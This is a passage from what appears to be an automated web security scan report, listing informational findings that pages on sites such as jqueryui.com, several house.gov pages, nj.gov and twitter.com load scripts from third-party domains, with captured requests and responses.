Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:10 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.15. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 13 Jul 2011 01:52:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

13.16. http://maloney.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maloney.house.gov
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: maloney.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:25:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: 8af8813af5d363f10c9b5f145dc6f833=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:25:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 37821

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>
<script src="http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js" type="text/javascript">
</script>
...[SNIP]...

13.17. http://malsup.com/jquery/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:14 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.18. https://market.android.com/details previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/details

Issue detail

The response dynamically includes the following scripts from other domains:

https://apis.google.com/js/plusone.js
https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US

Request

Response

13.19. https://market.android.com/developer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/developer

Issue detail

The response dynamically includes the following scripts from other domains:

https://apis.google.com/js/plusone.js
https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US

Request

Response

13.20. https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/static/client/js/1968918977-site_js_compiled_site_js.js

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/buzz/api/button.js

Request

GET /static/client/js/1968918977-site_js_compiled_site_js.js HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.avai.amp.pbn_delaware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Expires: Thu, 11 Aug 2011 01:06:07 GMT
Date: Tue, 12 Jul 2011 01:06:07 GMT
Last-Modified: Wed, 06 Jul 2011 22:53:47 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 210105
Age: 89634

function f(a){throw a;}var i=void 0,m=null;function aa(){return function(){}}function ba(a){return function(b){this[a]=b}}function n(a){return function(){return this[a]}}function q(a){return function(
...[SNIP]...
</a><script src="https://www.google.com/buzz/api/button.js"><\/script>
...[SNIP]...

13.21. http://medienfreunde.com/lab/innerfade/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

13.22. http://nj.gov/education/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nj.gov
Path:	/education/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js
http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js

Request

GET /education/ HTTP/1.1
Host: nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:24 GMT
Content-length: 16838
Content-type: text/html
Last-modified: Fri, 17 Jun 2011 18:44:34 GMT
Etag: "41c6-4dfba092"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="En">

<head>

<meta h
...[SNIP]...


<script type="text/javascript"

src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js"></script>
...[SNIP]...


<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js"></script>
...[SNIP]...

13.23. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js
http://ads.doclix.com/adserver/serve/js/doclix_synd_pop_under.js

Request

Response

13.24. http://peteking.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://peteking.house.gov
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/RepPeteKing.json?callback=twitterCallback2&count=1

Request

GET / HTTP/1.1
Host: peteking.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-Length: 15433
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="C
...[SNIP]...
</div>
               <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
               <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/RepPeteKing.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

13.25. http://qandanj.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://qandanj.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.questionpoint.org/crs/js/qwidget/qp.bootstrap.js?langcode=1&instid=11817&skin=blue&size=small

Request

GET / HTTP/1.1
Host: qandanj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:53:07 GMT
Content-Length: 20482
Content-Type: text/html
Content-Location: http://qandanj.org/index.htm
Last-Modified: Tue, 22 Mar 2011 05:33:59 GMT
Accept-Ranges: bytes
ETag: "7aeb5be52e8cb1:715"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<link rel="shortcut icon" href="http://www.qandanj.org/qandan
...[SNIP]...
</div>
<script id="qp.bootstrap" type="text/javascript" src="http://www.questionpoint.org/crs/js/qwidget/qp.bootstrap.js?langcode=1&instid=11817&skin=blue&size=small" charset="utf-8">//<noscript>
...[SNIP]...

13.26. http://rangel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rangel.house.gov
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.wibiya.com/Toolbars/dir_0857/Toolbar_857929/Loader_857929.js

Request

GET / HTTP/1.1
Host: rangel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
Server: U.S. House of Representatives
Date: Wed, 13 Jul 2011 01:53:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0857/Toolbar_857929/Loader_857929.js" type="text/javascript"></script>
...[SNIP]...

13.27. http://tonko.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tonko.house.gov
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://www.google.com/jsapi?key=ABQIAAAAVes5csel_qwD1lOMzHrYChQSK9YX4UZozh22jMbx5s4oUaO7hhSPLRb2xqj9RlQIDobCvpWtzFoGNA

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
</script> <script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAVes5csel_qwD1lOMzHrYChQSK9YX4UZozh22jMbx5s4oUaO7hhSPLRb2xqj9RlQIDobCvpWtzFoGNA"></script>
...[SNIP]...
</a> <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

13.28. http://twitter.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1310499774/javascripts/twitter.js?1309893581
http://a2.twimg.com/a/1310499774/javascripts/lib/gears_init.js?1309893581
http://a2.twimg.com/a/1310499774/javascripts/lib/jquery.tipsy.min.js?1309893581
http://a3.twimg.com/a/1310499774/javascripts/api.js?1309893581
http://a3.twimg.com/a/1310499774/javascripts/geov1.js?1309893581
http://a3.twimg.com/a/1310499774/javascripts/layout_newtwitter.js?1309893581
http://a3.twimg.com/a/1310499774/javascripts/lib/mustache.js?1309893581
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522800-71865-3084
ETag: "605d04975bd04dbcd5af5dbcf382d8c9"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:40 GMT
X-Runtime: 0.03641
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ee9849c5dfc40ffaec37fd046b2f29f18a437fd8
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 14650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1310499774/javascripts/twitter.js?1309893581" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1310499774/javascripts/lib/jquery.tipsy.min.js?1309893581" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1310499774/javascripts/lib/gears_init.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/lib/mustache.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/geov1.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/api.js?1309893581" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a3.twimg.com/a/1310499774/javascripts/layout_newtwitter.js?1309893581" type="text/javascript"></script>
...[SNIP]...

13.29. http://visitnj.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visitnj.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.30. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://badge.facebook.com/badge/1070526700.33.897046733.js
http://embed.technorati.com/embed/bzftjmf2gh.js
http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.3site.eu/JPU/JPU.js
http://www.3site.eu/JSL/JSL.php
http://www.3site.eu/devpro/GoogleTranslator.js
http://www.3site.eu/devpro/JSHighLighter.js
http://www.3site.eu/devpro/bigdollar.js
http://www.3site.eu/devpro/blog.js
http://www.3site.eu/examples/jSmile.js
http://www.3site.eu/javascript/GuruMeditation.js
http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=2004340713960404802
http://www.blogger.com/static/v1/common/js/1436446111-csitail.js
http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js
http://www.blogger.com/static/v1/v-js/979395223-backlink.js
http://www.google-analytics.com/urchin.js
http://www.ubuntu.com/files/countdown/display2.js

Request

GET /2009/01/32-bytes-to-know-if-your-browser-is-ie.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 13 Jul 2011 01:51:16 GMT
Date: Wed, 13 Jul 2011 01:51:16 GMT
Cache-Control: private, max-age=0
Last-Modified: Tue, 12 Jul 2011 23:32:03 GMT
ETag: "2176f134-56cc-4cf9-b732-71a44fad7bd2"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/WebReflection" />

<script type="text/javascript" src="http://www.3site.eu/JSL/JSL.php"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/bigdollar.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/JSHighLighter.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/blog.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/GoogleTranslator.js"></script>

<script type="text/javascript" src="http://www.3site.eu/JPU/JPU.js"></script>
<script type="text/javascript" src="http://www.3site.eu/javascript/GuruMeditation.js"></script>
<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.3site.eu/examples/jSmile.js">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=34454975&zx=2176f134-56cc-4cf9-b732-71a44fad7bd2"/><script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/979395223-backlink.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js"></script>
...[SNIP]...
<dl id="comments-block">
<script type="text/javascript" src="http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=2004340713960404802" charset="utf-8" defer="true">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

</div>

<script type="text/javascript" src="http://www.ubuntu.com/files/countdown/display2.js"></script>
...[SNIP]...
</ul>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
...[SNIP]...
</script>
<script src="http://badge.facebook.com/badge/1070526700.33.897046733.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://embed.technorati.com/embed/bzftjmf2gh.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/1436446111-csitail.js"></script>
...[SNIP]...

13.31. http://www.cio.ny.gov/universal_broadband previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cio.ny.gov
Path:	/universal_broadband

Issue detail

The response dynamically includes the following script from another domain:

http://widgets.twimg.com/j/2/widget.js

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:22 GMT
Cache-Control: must-revalidate
Connection: close
Content-Length: 34252
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<div>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

13.32. http://www.cs.state.ny.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cs.state.ny.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET / HTTP/1.1
Host: www.cs.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:29 GMT
Server: Apache
Set-Cookie: CFID=38248036;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Set-Cookie: CFTOKEN=85624385;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <title>New York State Department of Civil Service</title>
   <meta
...[SNIP]...
</script>
   <script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.33. http://www.delaware.gov/apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delaware.gov
Path:	/apps/

Issue detail

The response dynamically includes the following script from another domain:

http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087

Request

GET /apps/ HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=1; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522360152:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
       <head>
       
       <met
...[SNIP]...
<script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087"> </script>
...[SNIP]...

13.34. http://www.delaware.gov/topics/yourgovernment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delaware.gov
Path:	/topics/yourgovernment

Issue detail

The response dynamically includes the following script from another domain:

http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087

Request

GET /topics/yourgovernment HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
